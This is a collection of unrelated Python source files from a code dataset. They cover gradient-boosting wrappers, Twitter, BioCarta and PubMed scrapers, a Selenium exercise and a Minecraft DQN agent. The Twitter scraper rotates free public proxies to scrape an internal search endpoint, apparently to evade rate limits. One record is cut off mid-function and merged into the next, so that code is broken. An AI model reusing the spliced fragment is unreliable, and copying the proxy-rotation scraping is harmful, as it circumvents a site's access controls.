type(self.model) is lgb.sklearn.LGBMClassifier:\n            if multi_class is False:\n                self.score_val = roc_auc_score(y_val, y_pred_val)\n            else:\n                # TODO: what should the base evaluation metric for multi-class classification be?\n                # self.score_val = macro_f1(y_val, y_pred_val)\n                print(\"what should the base evaluation metric for multi-class classification be?\")\n        elif type(self.model) is lgb.sklearn.LGBMRegressor:\n            self.score_val = mean_squared_error(y_val, y_pred_val) ** 0.5\n\n    def get_model(self):\n        return self.model\n\n    def get_predict(self, test=True):\n        if test is True:\n            return self.y_pred_test\n        else:\n            return self.y_pred_val\n\n    def get_score(self):\n        return self.score_val\n\n\nclass Xgboost(Lightgbm):\n    def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n        super().__init__(params, num_boost, early_stopping_rounds, verbose)\n\n    def classifier(self, multi_class=False):\n        self.model = xgb.XGBClassifier(**self.params)\n        if \"metric\" not in self.params.keys():\n            if multi_class is False:\n                self.params[\"metric\"] = \"auc\"\n            else:\n                self.params[\"metric\"] = \"multi_logloss\"\n\n    def regressor(self):\n        self.model = xgb.XGBRegressor(**self.params)\n        if
\"metric\" in self.params.keys():\n self.params[\"metric\"] = \"rmse\"\n\n def fit(self, X_train, y_train, X_val, y_val):\n super().fit(X_train, y_train, X_val, y_val)\n\n def predict(self, X_val, X_test):\n super().predict(X_val, X_test)\n\n def evaluate(self, y_val, y_pred_val):\n assert (\n type(self.model) is xgb.sklearn.XGBClassifier\n or type(self.model) is xgb.sklearn.XGBRegressor\n ), print(\n \"model should be xgboost.sklearn.XGBClassifier or xgboost.sklearn.XGBRegressor\"\n )\n if type(self.model) is xgb.sklearn.XGBClassifier:\n self.score_val = roc_auc_score(y_val, y_pred_val)\n elif type(self.model) is xgb.sklearn.XGBRegressor:\n self.score_val = mean_squared_error(y_val, y_pred_val) ** 0.5\n","sub_path":"py/v1/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384590137","text":"from bs4 import BeautifulSoup\nimport requests\nimport sys\nimport json\nfrom itertools import cycle\n\n\ndef get_proxies(proxy_url='https://free-proxy-list.net/'):\n \n \"\"\" Extract proxy from web site and create proxy pool\n Source: https://github.com/taspinar/twitterscraper/blob/master/twitterscraper/query.py\n \"\"\"\n \n response = requests.get(proxy_url)\n soup = BeautifulSoup(response.text, 'lxml')\n table = soup.find('table',id='proxylisttable')\n list_tr = table.find_all('tr')\n list_td = [elem.find_all('td') for elem in list_tr]\n list_td = list(filter(None, list_td))\n list_ip = [elem[0].text for elem in list_td]\n list_ports = [elem[1].text for elem in list_td]\n list_proxies = [':'.join(elem) for elem in list(zip(list_ip, list_ports))]\n \n proxy_pool = cycle(list_proxies )\n \n return proxy_pool \n\n\ndef get_this_page_tweets(soup, searched_tweet_ids=[]):\n\n #res = soup.find_all(string=\"Bu aramayla ilgili hiç sonuç çıkmadı.\")\n \n replies = retweets = likes = tweet_count = 0\n \n tweets = soup.find_all('li', 'js-stream-item')\n \n for tweet in tweets:\n \n t_id = tweet[\"data-item-id\"]\n \n if t_id not in searched_tweet_ids:\n \n replies += int(tweet.find(\n 'span', 'ProfileTweet-action--reply u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n retweets += int(tweet.find(\n 'span', 'ProfileTweet-action--retweet u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n likes += int(tweet.find(\n 'span', 'ProfileTweet-action--favorite u-hiddenVisually').find(\n 'span', 'ProfileTweet-actionCount')['data-tweet-stat-count'] or '0')\n #html = str(tweet.find('p', 'tweet-text')) or \"\"\n print(t_id,tweet_count,replies, retweets, likes )\n \n searched_tweet_ids.append(t_id)\n \n print(\"here\", len(searched_tweet_ids))\n tweet_count = len(searched_tweet_ids)\n return searched_tweet_ids,tweet_count,replies, retweets, likes\n\ndef get_tweets_data(tweet_id, soup):\n \n proxy = next(proxy_pool)\n print('Parsing result for ',tweet_id,' proxy : ', proxy)\n searched_tweet_ids = []\n searched_tweet_ids, tweet_count, replies, retweets, likes = get_this_page_tweets(soup,searched_tweet_ids)\n if soup.find(\"li\", {\"class\": \"js-stream-item stream-item stream-item\"}) is not None:\n next_pointer = soup.find_all(\"li\", {\"class\": \"js-stream-item stream-item stream-item\"})[-1][\"data-item-id\"]\n query = \"https://twitter.com/trt2tv/status/{}\".format(tweet_id)\n \n while True:\n \n next_url = 
\"https://twitter.com/i/search/timeline?f=tweets&vertical=%27%20\\%20%27default&include_available_features=1&include_entities=1&%27%20\\%20%27reset_error_state=false&src=typd&max_position={}&q={}&l=tr%27\".format(next_pointer,query)\n next_response = None\n try:\n next_response = requests.get(next_url, headers = {'User-Agent': 'Mozilla/5.0'}, proxies={\"http\": proxy})\n \n if next_response.status_code != 200:\n print(\"Non success status code returned \"+str(next_response.status_code))\n pass\n else:\n print('Response : ', next_response)\n \n except Exception as e:\n # in case there is some issue with request. None encountered so far.\n print(e)\n return tweet_count, replies, retweets, likes\n \n tweets_data = next_response.text\n tweets_obj = json.loads(tweets_data)\n \n print(\"has more\",tweets_obj[\"has_more_items\"],\" and min pos\", tweets_obj[\"min_position\"])\n \n if tweets_obj[\"has_more_items\"] and tweets_obj[\"min_position\"]:\n # using two checks here bcz in one case has_more_items was false but there were more items\n next_pointer = tweets_obj[\"min_position\"]\n html = tweets_obj[\"items_html\"]\n print(\"html,\", html)\n soup = BeautifulSoup(html, 'lxml')\n searched_tweet_ids,tweet_count,replies1, retweets1, likes1 = get_this_page_tweets(soup,searched_tweet_ids)\n replies += replies1\n retweets += retweets1\n likes += likes1\n else:\n print(\"\\nNo more tweets returned\")\n break\n \n return tweet_count, replies, retweets, likes\n \nproxy_pool = get_proxies(proxy_url='https://free-proxy-list.net/')\n \ndef start(tweet_id = None):\n url = 'https://twitter.com/search?q=https://twitter.com/trt2tv/status/'+tweet_id+'&src=typed_query'\n response = None\n \n # Crawl data of the quote tweets of one tweet. In case \"get_tweets_data\" somehow returns\n # 0 for all values, the embedded function \"incase\" tries again at most \n # 25 times to find quote tweet data with a recursive call to itself.\n \n def incase(url,response,retry):\n \n try:\n response = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0'}) #headers=header) \n except Exception as e:\n print(repr(e))\n sys.exit(1)\n \n if response.status_code != 200:\n print(\"Non success status code returned \"+str(response.status_code))\n sys.exit(1)\n \n soup = BeautifulSoup(response.text, 'lxml')\n \n if soup.find(\"div\", {\"class\": \"errorpage-topbar\"}):\n print(\"\\n\\n Error: Invalid username.\")\n sys.exit(1)\n \n #print('my_url', url)\n tweet_count,replies, retweets, likes = get_tweets_data(tweet_id, soup)\n \n # recursive call to function if there is no quote_tweets. It could be that \n # there actually is no quote tweets, or more likely that something went wrong with\n # get_tweets_data function\n \n if tweet_count == 0 and retry > 0:\n return incase(url,response,retry-1)\n \n return tweet_count,replies, retweets, likes\n \n #print(\"%s\" % tweet_id + \" has \", tweet_count,\" quote tweets. 
The quote tweets have \", replies, \" replies, \", retweets, \" retweets and \", likes, \"likes\")\n \n return incase(url,response, 25)\n \n\n","sub_path":"get_quote_dataframe.py","file_name":"get_quote_dataframe.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18362562","text":"from __future__ import division\ndef average(li):\n sum=0\n for i in li :\n sum+=i\n return sum/len(li)\n\ndef nearest(average,li):\n mi=99999999\n mi_el=0\n for i in li:\n if abs(average-i) int:\n if k == 0 or s == \"\": return 0\n buffer = dict()\n p1 = 0\n res = 0\n for i in range(len(s)):\n if s[i] not in buffer: buffer[s[i]] = 0\n buffer[s[i]] += 1\n \n while(len(buffer) > k):\n if buffer[s[p1]] > 1: buffer[s[p1]] -= 1\n else: del buffer[s[p1]]\n p1 += 1\n \n res = max(res, i-p1+1)\n return res\n","sub_path":"LC340-Longest_substring_with_k_distinct.py","file_name":"LC340-Longest_substring_with_k_distinct.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432232372","text":"from __future__ import print_function, division, absolute_import\n\nimport numpy\nimport random \n\nimport sys\n\n\n\nimport skimage.transform\nimport matplotlib.pyplot as plt\n\n\n\ndef rot_gt(gt, a):\n fgt = gt.astype(numpy.float32)\n mi,ma = fgt.min(), fgt.max()\n fgt -= mi \n fgt /= (ma - mi)\n\n rot = skimage.transform.rotate(fgt,int(a), order=0)\n rot = numpy.clip(rot, 0.0, 1.0)\n rot *= (ma - mi)\n rot += mi\n return rot\n\ndef make_toy_dataset(shape=None, n_images=20, noise=1.0):\n imgs = []\n gts = []\n if shape is None:\n shape = (20, 20)\n for i in range(n_images):\n\n gt_img = numpy.zeros(shape)\n gt_img[0:shape[0]//2,:] = 1\n\n #gt_img[shape[0]//4: 3*shape[0]//4, shape[0]//4: 3*shape[0]//4] = 2\n\n ra = numpy.random.randint(180)\n #print ra \n gt_img = rot_gt(gt_img, ra)\n\n\n # plt.imshow(gt_img)\n # plt.show()\n\n img = gt_img + (numpy.random.random(shape)-0.5)*float(noise)\n\n # plt.imshow(img.squeeze())\n # plt.show()\n\n imgs.append(img.astype('float32'))\n gts.append(gt_img.astype('uint8'))\n\n return imgs, gts\n","sub_path":"exercise05/solution-thorsten/tools/toy_dataset.py","file_name":"toy_dataset.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644359879","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.3.dev0'\n\nsetup(name='Products.directory',\n version=version,\n description=\"Manage generic directories\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.communesplone.org/svn/communesplone/Products.directory',\n license='GPL',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'Products.CMFPlone',\n # -*- Extra requirements: -*-\n 'tecnoteca.googlemap',\n 'plone.api',\n 'z3c.table',\n 'plone.z3ctable',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n 'testfixtures',\n 'tecnoteca.googlemap',\n ]\n },\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n 
)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647884613","text":"# -*- python -*-\n#\n# This file is part of bioservices software\n#\n# Copyright (c) 2013-2014 - EBI-EMBL\n#\n# File author(s):\n# Thomas Cokelaer \n# \n#\n# Distributed under the GPLv3 License.\n# See accompanying file LICENSE.txt or copy at\n# http://www.gnu.org/licenses/gpl-3.0.html\n#\n# website: https://github.com/cokelaer/bioservices\n# documentation: http://packages.python.org/bioservices\n#\n##############################################################################\n#$Id$\n\"\"\"Interface to some part of the UniProt web service\n\n.. topic:: What is UniProt ?\n\n :URL: http://www.uniprot.org\n :Citation:\n\n .. highlights::\n\n \"The Universal Protein Resource (UniProt) is a comprehensive resource for protein\n sequence and annotation data. The UniProt databases are the UniProt\n Knowledgebase (UniProtKB), the UniProt Reference Clusters (UniRef), and the\n UniProt Archive (UniParc). The UniProt Metagenomic and Environmental Sequences\n (UniMES) database is a repository specifically developed for metagenomic and\n environmental data.\"\n\n -- From Uniprot web site (help/about) , Dec 2012\n\n\n.. mapping between uniprot and bunch of other DBs.\n.. ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/idmapping/\n.. http://www.uniprot.org/docs/speclist\n.. http://www.uniprot.org/docs/pkinfam\n\n\"\"\"\nfrom services import REST\nfrom xmltools import readXML\n__all__ = [\"BioCarta\"]\n\n\nclass BioCarta(REST):\n \"\"\"Interface to `BioCarta `_ pages\n\n\n This is not a REST interface actually but rather a parser to some of the\n HTML pages relatd to pathways.\n\n One can retrieve the pathways names and their list of proteins.\n\n >>> from bioservics import *\n >>> b = BioCarta()\n >>> pathways = b.get_pathway_names()\n >>> proteins = b.get_pathway_protein_names(pathways[0])\n\n\n .. warning:: biocarta pathways layout can be accesses from PID\n\n \"\"\"\n _url = \"http://www.biocarta.com/\"\n def __init__(self, verbose=True):\n \"\"\"**Constructor**\n\n :param verbose: set to False to prevent informative messages\n \"\"\"\n super(BioCarta, self).__init__(name=\"BioCarta\", url=BioCarta._url, verbose=verbose)\n self.fname = \"biocarta_pathways.txt\"\n\n self._allPathwaysURL = \"http://www.biocarta.com/genes/allPathways.asp\"\n\n def get_pathway_names(self, startswith=\"\"):\n \"\"\"returns pathways from biocarta\n\n all human and mouse. can perform a selectiom\n \"\"\"\n x = readXML(self._allPathwaysURL)\n pathways = [this.get(\"href\") for this in x.findAll(\"a\") if \"pathfiles\" in this.get(\"href\")]\n pathways = [str(xx.split(\"/\")[-1]) for xx in pathways] # split the drive\n pathways = sorted(list(set(pathways)))\n pathways = [xx for xx in pathways if xx.startswith(startswith)]\n return pathways\n\n def get_pathway_protein_names(self, pathway):\n \"\"\"returns list of list. Each elements is made of 3 items: gene name,\n locusId and accession (often empty\n\n Requires to parse HTML page such as\n http://www.biocarta.com/pathfiles/m_actinYPathway.asp\n\n to figure out the URL that would pop up if we press the protein list\n button. 
For instance:\n\n http://www.biocarta.com/pathfiles/PathwayProteinList.asp?showPFID=175\n\n but now we need to parse the HTML, which is not necessaray very robust.\n THere are many tables and we want to access one that is a children of\n another... Finally, We scan the table for tr and td tags.\n\n The most difficult is to find the good table which is hardcoded to be\n the third that contains a th[0] == \"Gene name\". Although there is only\n one, 3 are returned due probably to an error in the parsing or the HTMl\n file itself. To be checked and made more robust.\n\n \"\"\"\n url = self._url + \"/pathfiles/\" + pathway\n x = readXML(url)\n self.logging.info(\"Reading \" + url)\n protein_url = [this.get(\"href\") for this in x.findAll(\"a\") \\\n if 'href' in this and \"Protein\" in this.get(\"href\")]\n if len(protein_url) == 0:\n return None\n else:\n link = protein_url[0]\n link = link.split(\"/pathfiles/\")[-1]\n link = str(link) # get rid of unicode ?\n link = link.strip(\"')\")\n url = self._url + \"/pathfiles/\" + link\n self.logging.info(\"Reading \" + url)\n x = readXML(url)\n\n # seems to work\n table = [this for this in x.findAll(\"table\") if this.findAll(\"th\")\n and this.findAll(\"th\")[0].getText() == \"Gene Name\"][2]\n # now get the genename, locus and accession\n rows = [[y.getText() for y in xx.findAll(\"td\")] for xx in table.findAll(\"tr\")]\n rows = [xx for xx in rows if len(x)]\n return rows\n","sub_path":"src/bioservices/biocarta.py","file_name":"biocarta.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509017940","text":"from bs4 import BeautifulSoup\nimport pickle as pk\nimport requests\nimport re\nimport spacy\nnlp = spacy.load(\"en_core_web_sm\")\nimport geograpy\nimport nltk\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('maxent_ne_chunker')\nnltk.download('words')\n\ninstitute_keywords = [\n 'unive',\n 'colle',\n 'hosp',\n 'labor',\n 'insti',\n 'founda',\n 'centr',\n 'cente',\n 'clinic',\n 'depart',\n 'health',\n 'servi',\n 'assoc',\n 'organi',\n 'allia',\n 'socie',\n 'resear',\n 'corpor',\n 'pharm',\n 'facult',\n 'school',\n 'grupo',\n 'biolog',\n 'infirm',\n 'ltd',\n 'samsung',\n 'nvidia'\n]\n\ndef extract_affiliation_short_name(title):\n words = re.split('[^\\w\\s\\']', title)\n for keyword in institute_keywords:\n result = [word for word in words if re.search(keyword, word.strip().lower())]\n if len(result) > 0:\n result = result[-1].strip()\n return result\n \n return None\n\nclass Author():\n def __init__(self):\n self.name = str\n self.affiliation_long_name = str\n self.affiliation_short_name = str\n self.affiliation_country = str\n\nclass Article():\n def __init__(self):\n self.id = int\n self.url = str\n self.title = str\n self.year = int\n self.keywords = []\n self.authors = []\n\nclass ArticleCollection():\n def __init__(self):\n self.articles = dict()\n\n def load_years(self, years_list):\n self.processed_pages = dict()\n for year in years_list:\n self.processed_pages[year] = []\n self.current_year = years_list[0]\n\n def get_article_data(self, article_link):\n no_keywords = False\n no_authors = False\n\n r = requests.get(article_link)\n souped = BeautifulSoup(r.content.decode('utf-8'), features='html.parser')\n article = Article()\n article.url = article_link\n id = int(souped.find('strong', attrs={'title': 'PubMed ID'}).text)\n article.id = id\n article.title = souped.find('h1', attrs={'class': 
'heading-title'}).text.strip()\n\n pub_date = souped.find('span', attrs={'class': 'cit'}).text.strip().split(';')[0]\n article.year = int(re.findall('\\d{4}', pub_date)[0])\n\n authors_list = souped.find('div', attrs={'class': 'authors-list'})\n authors = []\n if authors_list != None:\n authors_in_article = authors_list.find_all('span', attrs={'class': 'authors-list-item'})\n\n for author_i in authors_in_article:\n author = Author()\n author_data = author_i.find('a', attrs={'class': 'full-name'})\n if author_data != None:\n affiliation_data = author_i.find_all('a', attrs={'class': 'affiliation-link'})\n\n author.name = author_data['data-ga-label']\n\n if len(affiliation_data) > 0:\n affiliation = affiliation_data[0] # En caso de tener más de 1 afiliación, tomamos la primera\n title = affiliation['title']\n author.affiliation_long_name = title\n doc = nlp(title)\n\n author.affiliation_short_name = extract_affiliation_short_name( title )\n\n places = [re.sub('[^\\w\\s]', '', str(ent)) for ent in doc.ents if ent.label_ == 'GPE' ]\n places = ['United States' if place =='USA' else place for place in places]\n places = ['United Kingdom' if place =='UK' else place for place in places]\n places = geograpy.places.PlaceContext(places)\n if len(places.countries) > 0:\n author.affiliation_country = places.countries[0]\n elif len(places.other) > 0:\n author.affiliation_country = places.other[0]\n \n if author.affiliation_short_name != None:\n authors.append(author)\n else:\n print('Affiliation missed:', author.affiliation_long_name)\n\n article.authors = authors\n if len(authors) == 0:\n no_authors = True\n\n keywords = souped.find('strong', string='\\n Keywords:\\n ')\n if keywords != None:\n keywords = keywords.next_sibling.strip().split(';')\n keywords = [re.sub( ' +', ' ', re.sub('[^\\w\\s]', ' ', keyword.strip()) ) for keyword in keywords ]\n article.keywords = keywords\n else:\n no_keywords = True\n\n if no_keywords:\n return 'skipped - no keywords'\n elif no_authors:\n return 'skipped - no authors'\n else:\n self.articles[id] = article\n return 'passed'\n \n def save(self, filename):\n with open(filename, 'wb') as output:\n pk.dump(self.__dict__, output, pk.HIGHEST_PROTOCOL)\n\n def load(self, filename):\n with open(filename, 'rb') as input:\n tmp_dict = pk.load(input)\n self.__dict__.update(tmp_dict)","sub_path":"data-processing/Article.py","file_name":"Article.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208042158","text":"import pandas as pd\nimport seaborn as sns\n\ndata_file = pd.ExcelFile(\n \"/Users/hughesn/Transcripts/RNA-Seq/Analysis/Data/diff_from_col0:False_onlyDiff:False.xlsx\")\nsheet_names = data_file.sheet_names\n\ndfs = []\nfor s in sheet_names:\n d = data_file.parse(s)\n d['sample'] = s.split(\"|\")[0].replace(\" \", \"\")\n dfs.append(d)\n\ndf = pd.concat(dfs)\n\ndf = df.rename_axis('gene').sort_values(\n by=['gene', 'log2FoldChange'], ascending=[False, False])\n\nbottom = df.iloc[:len(sheet_names)*20]\n\n\nbottom = bottom.pivot(columns='sample', values='log2FoldChange')\n# bottom['Control'] = 0\nsns.clustermap(bottom, cmap='bwr', z_score=0)\nplt.show()\n\n# top = df.iloc[-20:-1]\n","sub_path":"Python/analyse_data.py","file_name":"analyse_data.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290990185","text":"from selenium import webdriver\nimport time\nfrom 
selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\n\n\n\ntry:\n oldLink = \"http://suninjuly.github.io/selects1.html\"\n link = \"http://suninjuly.github.io/selects2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n num1 = (int)(browser.find_element(By.XPATH, \"//span[@id='num1']\").text)\n num2 = (int)(browser.find_element(By.XPATH, \"//span[@id='num2']\").text)\n browser.find_element(By.XPATH, \"//select[@id='dropdown']\").click()\n select=Select(browser.find_element_by_tag_name(\"select\"))\n select.select_by_visible_text((str)(num1+num2))\n\n # Отправляем заполненную форму\n button = browser.find_element(By.XPATH, \"//button\")\n button.click()\n\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(5)\n # закрываем браузер после всех манипуляций\n browser.quit()","sub_path":"stepik_02_02_03.py","file_name":"stepik_02_02_03.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222980327","text":"import marlo\r\nimport numpy as np\r\nimport random\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D,Flatten, AveragePooling2D\r\nfrom collections import deque\r\nfrom keras.models import model_from_yaml\r\nfrom matplotlib import pyplot as plt\r\nfrom past.utils import old_div # tutorial 5\r\nimport MalmoPython\r\nimport sys\r\nimport utils\r\nimport csv\r\nfrom time import sleep\r\n\r\nimport pdb\r\nfrom keras.backend import manual_variable_initialization\r\n\r\n\r\n# Notes:\r\n# env.action_space.sample() gives a random action from those available, applies to any env\r\n# TODO The loaded model seems to always give action 2 as the best one. I suspsect this is n issue with the loading as the model performes better after a period of training\r\n# I've checked that the model correctly pulls in weights so it can't be that.\r\n# TODO to make best use of the DQN I need to use an LTSM or stack previous game frames before sending them to the NN. See the deepmind atari paper or hausknecht and stone 2015\r\n# TODO info data contains the orientation and position of the agent, could use this as a feature to train the nn. That might be best as a separate nn that takes in the history of actions taken How does it deal with the straint position being none zero, how does it deal with the maps changing?\r\n# L Even just having the NN output the position it thinks its in would be a useful thing to train. 
What other features are valuable to extract from the images?\r\n# TODO consider transfer learining from pretrained CNN\r\n# TODO Ben: Create method to rotate the floor grid by the yaw as a function\r\n# TODO Johnny: Create method to do 5 turns in a given direction rather than one\r\n# TODO Matt: Adapt the NN to output the floor grid as well as the q-values.\r\n\r\n\r\ndef trainAgent(env, agent):\r\n # Amount of steps till stop\r\n goal_steps = 100\r\n # How many games to train over\r\n initial_games = 10000\r\n # Batch for back-propagation\r\n batch_size = 16\r\n scores = deque(maxlen=50)\r\n results = []\r\n # Loop over the games initialised\r\n for i in range(initial_games):\r\n reward = 0\r\n game_score = 0\r\n # Short wait required to prevent loss of connection to marlo\r\n sleep(2)\r\n env.reset()\r\n state = env.last_image\r\n # For each step of taken action\r\n for j in range(goal_steps):\r\n print(\"Starting goal step: \", j + 1, \" of game: \", i + 1, \" avg score: \", np.mean(scores))\r\n action = agent.act(state)\r\n # Receive the outcome of the action\r\n new_state, reward, done, info = env.step(action)\r\n\r\n\r\n # Adds this image and action to memory\r\n agent.memory.append((state,action, reward, new_state, done))\r\n\r\n if done:\r\n # Score is the scores for finished games\r\n print(\"Game: \",i ,\" complete, score: \" , game_score,\" last 50 scores avg: \", np.mean(scores), \" epsilon \", agent.epsilon)\r\n scores.append(game_score)\r\n break\r\n game_score += reward\r\n state = new_state\r\n oldInfo = info\r\n\r\n # This memory is the last seen game images\r\n if len(agent.memory) > batch_size:\r\n # Find a random batch from the memory\r\n randomBatch = random.sample(agent.memory, batch_size)\r\n # Perform backpropagation\r\n agent.replay(randomBatch)\r\n\r\n results.append([game_score,j,oldInfo['observation']['TotalTime'], agent.epsilon])\r\n # Save results so far\r\n with open(agent.CSVName,\"w\") as f:\r\n wr = csv.writer(f)\r\n wr.writerows(results)\r\n # Decay the epsilon until the minimum\r\n if agent.epsilon > agent.epsilon_min:\r\n agent.epsilon *= agent.epsilon_decay\r\n else:\r\n agent.epsilon = 0\r\n # Update the storage of the model\r\n model_yaml = agent.model.to_yaml()\r\n with open(\"model.yaml\", \"w\") as yaml_file:\r\n yaml_file.write(model_yaml)\r\n # Save the weights of the model\r\n agent.model.save_weights('model_weights.h5')\r\n\r\n return scores\r\n\r\ndef testAgent(env, agent):\r\n goal_steps = 500\r\n initial_games = 50\r\n scores = deque(maxlen=50)\r\n for i in range(initial_games):\r\n reward = 0\r\n game_score = 0\r\n env.reset()\r\n state = env.last_image\r\n for j in range(goal_steps):\r\n action = agent.act(state)\r\n print(\"Starting goal step: \", j, \" of game: \", i, \" avg score: \", np.mean(scores), \" action: \", action)\r\n new_state, reward, done, info = env.step(action)\r\n #pdb.set_trace()\r\n if done:\r\n print(\"Game: \",i ,\" complete, score: \" , game_score,\" last 50 scores avg: \", np.mean(scores), \" epsilon \", agent.epsilon)\r\n scores.append(game_score)\r\n break\r\n game_score += reward\r\n state = new_state\r\n return scores\r\n\r\nclass agent:\r\n def __init__(self, observation_shape, action_size, block_map_shape, load_model_file = False, epsilon = 1.0):\r\n # Initialise parameters for the agent\r\n self.observation_shape = observation_shape\r\n self.action_size = action_size\r\n self.block_list = ['air','cobblestone','stone','gold_block']\r\n self.block_vision_size = len(self.block_list) * block_map_shape[0] * 
block_map_shape[1]\r\n        self.memory = deque(maxlen=2000)\r\n        self.gamma = 1.0 # discount rate\r\n        self.epsilon_min = 0.01\r\n        self.epsilon = epsilon\r\n        self.epsilon_decay = 0.999\r\n        self.learning_rate = 0.5\r\n        self.CSVName = 'dqn_bot_results.csv'\r\n\r\n        if load_model_file:\r\n            # If you want to load a previous model\r\n            # This is required to stop tensorflow reinitialising weights on model load\r\n            #manual_variable_initialization(True)\r\n            #self.model = load_model('model.h5')\r\n            #self.model.load_weights('model.h5')\r\n            yaml_file = open('model.yaml', 'r')\r\n            loaded_model_yaml = yaml_file.read()\r\n            yaml_file.close()\r\n            self.model = model_from_yaml(loaded_model_yaml)\r\n            self.model.load_weights('model_weights.h5')\r\n            self.model.compile(loss='mse', optimizer='rmsprop')\r\n        else:\r\n            # Start from scratch\r\n            self.model = self.create_model()\r\n\r\n    def create_model(self):\r\n        model = Sequential()\r\n        # Need to check that this is processing the colour bands correctly <- have checked this and:\r\n        # the default is channels last which is what we have\r\n\r\n        # This max pooling layer is quite extreme because of memory limits on machine\r\n        model.add(AveragePooling2D(pool_size=(8, 8), input_shape=(self.observation_shape)))\r\n\r\n        model.add(Conv2D(32, 8, 4)) # Convolutions set to same as in Lample and Chaplet\r\n        model.add(Conv2D(64, 4, 2)) # Convolutions set to same as in Lample and Chaplet\r\n\r\n        # Flatten needed to get a single vector as output otherwise get a matrix\r\n        model.add(Flatten())\r\n        model.add(Dense(128,activation='relu'))\r\n        model.add(Dense(64,activation='relu'))\r\n        model.add(Dense(self.action_size,activation='linear'))\r\n        model.compile(loss='mse', optimizer='rmsprop')\r\n        return model\r\n\r\n    def act(self, state):\r\n        # With probability epsilon take a random action to allow exploration\r\n        # When epsilon is high, higher chance, therefore decrease it over time\r\n        # This then results in exploration early on with greater exploitation later\r\n        if np.random.rand() <= self.epsilon:\r\n            print(\"Random Action\")\r\n            return random.randrange(self.action_size)\r\n        act_values = self.model.predict(state.reshape([-1, 600, 800, 3]))\r\n        return np.argmax(act_values[0])\r\n\r\n    def replay(self, batch):\r\n        # This is how the agent is trained\r\n        x_train = []\r\n        y_train = []\r\n        for state, action, reward, newState, done in batch:\r\n            if done:\r\n                # If finished\r\n                # Set the reward for finishing the game\r\n                target_q = reward\r\n            else:\r\n                # If not finished\r\n                #pdb.set_trace()\r\n                #self.model.predict(newState.reshape([-1, 600, 800, 3]))\r\n\r\n                # Bellman equation - use the estimate of the best Q-value in the next state\r\n                # Recalling what happened, not what could happen\r\n                # Target_Q is the ground truth Y\r\n                target_q = reward + self.gamma * np.amax(self.model.predict(newState.reshape([-1, 600, 800, 3])))\r\n\r\n            # prediction is prediction_q\r\n            # prediction has the 5 actions and predicted q-values\r\n            prediction = self.model.predict(state.reshape([-1, 600, 800, 3]))\r\n            # update the certain action that we did take with a better target, from above\r\n            prediction[0][action] = target_q\r\n\r\n            # Create the training data for X and Y that we use to fit the CNN on\r\n            x_train.append(state)\r\n            y_train.append(prediction[0])\r\n\r\n        # Use the training data to fit the model, via the batch\r\n        self.model.fit(np.asarray(x_train),np.asarray(y_train),epochs=1,verbose=0)\r\n        return\r\n\r\n    def blockEncoder(self, floorList):\r\n        # We need to convert the block names from strings to vectors as they are categorical data\r\n        # takes in an i-length list of the blocks with j different block types and returns an i*j length list indicating the encoded version.\r\n        blockList = self.block_list\r\n        # TODO need to simplify the classes to classify these under a type of: air, goal, solid, danger (lava)\r\n        blockDict = {}\r\n        for i,block in enumerate(blockList):\r\n            blockDict[block] = np.zeros(len(blockList))\r\n            blockDict[block][i] = 1\r\n\r\n        vectorisedList = []\r\n        for i in floorList:\r\n            # Adds content of list to other list. N.B. we might want to use append here depending on how we handle the data\r\n            vectorisedList.extend(blockDict[i])\r\n        return vectorisedList\r\n\r\ndef loadMissionFile(filename):\r\n    with open(filename, 'r') as file:\r\n        missionXML = file.read()\r\n    return missionXML\r\n\r\ndef main():\r\n    if len(sys.argv) > 1:\r\n        env = utils.setupEnv(sys.argv[1])\r\n    else:\r\n        env = utils.setupEnv()\r\n\r\n    # Get the number of available states and actions - generates the output of CNN\r\n    observation_shape = env.observation_space.shape\r\n    action_size = env.action_space.n\r\n    #pdb.set_trace()\r\n    # Can start from a pre-built model\r\n    #load = input(\"Load model? y/n or an epsilon value to 